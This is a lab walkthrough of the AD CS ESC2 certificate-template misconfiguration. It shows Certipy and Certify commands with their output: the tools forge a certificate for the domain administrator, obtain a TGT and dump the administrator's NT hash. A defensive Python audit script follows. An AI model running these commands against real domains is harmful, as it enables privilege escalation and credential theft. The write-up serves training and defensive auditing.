ESC2

1. What is ESC2

ESC2 is essentially a variant of ESC1.

When a certificate template specifies the "Any Purpose" Extended Key Usage (EKU), or specifies no EKU at all, certificates issued from it can be used for any purpose (client authentication, server authentication, code signing, and so on).

  • Scenario one (ESC1-like): if the template also allows a Subject Alternative Name (SAN) to be specified in the certificate signing request (CSR), a template vulnerable to ESC2 can be exploited directly, exactly as in ESC1 (i.e. to forge an arbitrary user's identity and log in as that user).
  • Scenario two: if the requester cannot specify a SAN directly, the certificate can still serve as a "prerequisite" that is used to request another, new certificate on behalf of any other user (i.e. it is used as an enrollment agent certificate).

2. Exploitation

2.1. Requirements

  1. The CA grants enrollment rights to low-privileged users
  2. Manager approval is disabled
  3. No authorized signatures are required
  4. The template's access control (security descriptor) is too permissive, allowing low-privileged users to enroll in this template
  5. The template defines the "Any Purpose" EKU or specifies no Extended Key Usage

2.2. On Linux

2.2.1. Enumeration

┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 41 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 18 enabled certificate templates
[*] Finding issuance policies
[*] Found 29 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'lab-LAB-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'lab-LAB-DC-CA'
[*] Checking web enrollment for CA 'lab-LAB-DC-CA' @ 'LAB-DC.lab.local'
[!] Error checking web enrollment: [Errno 104] Connection reset by peer
[!] Use -debug to print a stacktrace
[*] Enumeration output:

    Template Name                       : ESC2
    Display Name                        : ESC2
    Certificate Authorities             : lab-LAB-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : True
    Any Purpose                         : True
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Any Purpose
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 99 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2023-05-01T16:59:28+00:00
    Template Last Modified              : 2023-07-05T11:47:20+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LAB.LOCAL\Domain Admins
                                          LAB.LOCAL\Domain Users
                                          LAB.LOCAL\Enterprise Admins
      Object Control Permissions
        Owner                           : LAB.LOCAL\Administrator
        Full Control Principals         : LAB.LOCAL\Domain Admins
                                          LAB.LOCAL\Enterprise Admins
        Write Owner Principals          : LAB.LOCAL\Domain Admins
                                          LAB.LOCAL\Enterprise Admins
        Write Dacl Principals           : LAB.LOCAL\Domain Admins
                                          LAB.LOCAL\Enterprise Admins
        Write Property Enroll           : LAB.LOCAL\Domain Admins
                                          LAB.LOCAL\Domain Users
                                          LAB.LOCAL\Enterprise Admins
    [+] User Enrollable Principals      : LAB.LOCAL\Domain Users
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.
      ESC2                              : Template can be used for any purpose.

The characteristics of the ESC2 template are visible here:

  • The basic conditions (no manager approval, no authorized signature required)
  • Any Purpose: True, or Extended Key Usage : Any Purpose
  • The template also allows a SAN to be specified, which means it is vulnerable to ESC1 as well

2.2.2. Exploitation

https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc2-any-purpose-certificate-template
Because the ESC2 template here allows an alternative user (SAN) to be added in the CSR, it can be abused with the same attack path as an ESC1 template.

┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy  req -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -ca lab-LAB-DC-CA -target LAB-DC.lab.local -template ESC2 -upn 'administrator@lab.local'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 70
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@lab.local'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy auth -pfx administrator.pfx -dc-ip 10.129.22.58
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@lab.local'
[*] Using principal: 'administrator@lab.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@lab.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe

2.3. On Windows

2.3.1. Enumeration

C:\Users\blwasp\Desktop>.\Certify.exe enum-templates --filter-enabled --filter-vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v2.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=lab,DC=local'
[*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.

Template Name                         : ESC2
Enabled                               : True
Publishing CAs                        : LAB-DC.lab.local\lab-LAB-DC-CA
Schema Version                        : 2
Validity Period                       : 99 years
Renewal Period                        : 6 weeks
Certificate Name Flag                 : ENROLLEE_SUPPLIES_SUBJECT
Enrollment Flag                       : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Manager Approval Required             : False
Authorized Signatures Required        : 0
Extended Key Usage                    : Any Purpose
Certificate Application Policies      : Any Purpose
Vulnerabilities
  ESC1                                : The template has a client authentication EKU and allows enrollees to supply subject.
Permissions
  Enrollment Permissions
    Enrollment Rights           : LAB\Domain Admins                  S-1-5-21-2570265163-3918697770-3667495639-512
                                  LAB\Domain Users                   S-1-5-21-2570265163-3918697770-3667495639-513
                                  LAB\Enterprise Admins              S-1-5-21-2570265163-3918697770-3667495639-519
  Object Control Permissions
    Owner                       : LAB\Administrator                  S-1-5-21-2570265163-3918697770-3667495639-500
    Write Owner                 : LAB\Administrator                  S-1-5-21-2570265163-3918697770-3667495639-500
                                  LAB\Domain Admins                  S-1-5-21-2570265163-3918697770-3667495639-512
                                  LAB\Enterprise Admins              S-1-5-21-2570265163-3918697770-3667495639-519
    Write Dacl                  : LAB\Administrator                  S-1-5-21-2570265163-3918697770-3667495639-500
                                  LAB\Domain Admins                  S-1-5-21-2570265163-3918697770-3667495639-512
                                  LAB\Enterprise Admins              S-1-5-21-2570265163-3918697770-3667495639-519
    Write Property              : LAB\Administrator                  S-1-5-21-2570265163-3918697770-3667495639-500
                                  LAB\Domain Admins                  S-1-5-21-2570265163-3918697770-3667495639-512
                                  LAB\Enterprise Admins              S-1-5-21-2570265163-3918697770-3667495639-519

Alternatively, enumerate with PowerShell:

PS C:\Tools> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=lab,DC=local'

DistinguishedName                                                                                     Name  ObjectClass            ObjectGUID
-----------------                                                                                     ----  -----------            ----------
CN=CA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local    CA    pKICertificateTemplate bf1d9716-8772-4388-b043-1df4a7550492
CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local SubCA pKICertificateTemplate 07cbebe1-00fb-4e23-9d6e-15644c9a95e0
CN=ESC2,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local  ESC2  pKICertificateTemplate f09870a6-cdcc-4951-bcd0-fa875a1248aa
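The LDAP filter above and the requirements list in section 2.1 express the same set of tests. The following added audit script (not part of this page, Certipy or Certify) applies those tests in Python over constructed in-memory template records, so a defender can see exactly which attribute values make a template ESC2-exposed and which one to change to fix it. The flag bits and OIDs are the documented MS-CRTD values; the domain SID, template names and enrollment ACLs are constructed sample data.

```python
"""Audit certificate template attributes for the ESC2 conditions.

Mirrors the LDAP filter on this page:
  - msPKI-Enrollment-Flag bit 0x2 (CT_FLAG_PEND_ALL_REQUESTS) clear -> no manager approval
  - msPKI-RA-Signature absent or 0                             -> no authorized signatures
  - pKIExtendedKeyUsage absent, or containing 2.5.29.37.0      -> any purpose / no EKU
and adds the enrollment-rights check from the requirements list.
"""
from dataclasses import dataclass, field
from typing import List, Optional

# msPKI-Enrollment-Flag bits
CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS = 0x1
CT_FLAG_PEND_ALL_REQUESTS = 0x2            # "Manager Approval Required"
CT_FLAG_PUBLISH_TO_DS = 0x8
# msPKI-Certificate-Name-Flag bit
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1
# pKIExtendedKeyUsage OIDs
OID_ANY_PURPOSE = "2.5.29.37.0"            # anyExtendedKeyUsage
OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"

# Principals treated as low-privileged: well-known SIDs plus domain RIDs.
LOW_PRIV_SIDS = {"S-1-5-11", "S-1-1-0"}    # Authenticated Users, Everyone
LOW_PRIV_RIDS = {"513", "515"}             # Domain Users, Domain Computers


@dataclass
class Template:
    name: str
    enrollment_flag: int
    ra_signature: Optional[int]            # None models an absent msPKI-RA-Signature
    ekus: Optional[List[str]]              # None models an absent pKIExtendedKeyUsage
    name_flag: int
    enroll_sids: List[str] = field(default_factory=list)  # SIDs holding Enroll


def is_low_priv(sid: str) -> bool:
    return sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS


def esc2_conditions(t: Template) -> dict:
    """Evaluate each ESC2 precondition separately (all must hold for exposure)."""
    return {
        "no_manager_approval": not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS),
        "no_ra_signature": not t.ra_signature,                      # None or 0
        "any_purpose_or_no_eku": t.ekus is None or OID_ANY_PURPOSE in t.ekus,
        "low_priv_can_enroll": any(is_low_priv(s) for s in t.enroll_sids),
    }


def audit_esc2(t: Template) -> List[str]:
    """Return findings for one template; an empty list means not ESC2-exposed."""
    if not all(esc2_conditions(t).values()):
        return []
    findings = [f"{t.name}: ESC2 (any-purpose/no EKU, no approval, "
                f"no signature, low-privileged enrollment)"]
    if t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append(f"{t.name}: ESC1 overlap, enrollee supplies subject/SAN")
    else:
        findings.append(f"{t.name}: usable as an enrollment-agent certificate "
                        f"to request on behalf of other users")
    return findings


def remediation(t: Template) -> List[str]:
    """Which preconditions to break; restricting the EKU is always the first fix."""
    if not audit_esc2(t):
        return []
    steps = ["restrict pKIExtendedKeyUsage to the EKUs the template really needs"]
    steps.append("remove Enroll from low-privileged principals, or enable "
                 "manager approval (CT_FLAG_PEND_ALL_REQUESTS)")
    if t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        steps.append("clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT")
    return steps


# Constructed sample data (domain SID and ACLs are made up for the example).
DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLES = [
    # Same attribute values as the ESC2 template shown in the enumeration output
    Template("ESC2", CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS | CT_FLAG_PUBLISH_TO_DS, 0,
             [OID_ANY_PURPOSE], CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
             [f"{DOMAIN}-512", f"{DOMAIN}-513", f"{DOMAIN}-519"]),
    # No EKU at all, subject built from AD -> scenario two (enrollment agent)
    Template("NoEKU", CT_FLAG_PUBLISH_TO_DS, None, None, 0, ["S-1-5-11"]),
    # Ordinary user template: explicit client-auth EKU only -> not ESC2
    Template("User", CT_FLAG_PUBLISH_TO_DS, 0, [OID_CLIENT_AUTH], 0, [f"{DOMAIN}-513"]),
    # Any Purpose but gated by manager approval -> not ESC2
    Template("Approved", CT_FLAG_PEND_ALL_REQUESTS, 0, [OID_ANY_PURPOSE],
             CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, [f"{DOMAIN}-513"]),
]


def run_audit(templates=SAMPLES) -> dict:
    return {t.name: audit_esc2(t) for t in templates}


if __name__ == "__main__":
    for name, findings in run_audit().items():
        print(name, "->", findings or ["not ESC2-exposed"])
```

To run this against a real forest, populate `Template` from the `msPKI-Enrollment-Flag`, `msPKI-RA-Signature`, `pKIExtendedKeyUsage` and `msPKI-Certificate-Name-Flag` attributes of each `pKICertificateTemplate` object and from the Enroll ACEs in its security descriptor; the logic itself is unchanged.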

2.3.2. Exploitation

The exploitation method here is identical to ESC1.

C:\Users\blwasp\Desktop>Certify.exe request --ca LAB-DC.lab.local\lab-LAB-DC-CA --template ESC2 --upn administrator@lab.local

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v2.0.0

[*] Action: Request a certificate

[*] Current user context    : LAB\blwasp
[*] No subject name specified, using current context as subject.

[*] Template                : ESC2
[*] Subject                 : CN=Black Wasp, CN=Users, DC=lab, DC=local
[*] Subject Alt Name(s)     : administrator@lab.local

[*] Certificate Authority   : LAB-DC.lab.local\lab-LAB-DC-CA
[*] CA Response             : The certificate has been issued.
[*] Request ID              : 71

[*] Certificate (PFX)       :

MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+............

3. References: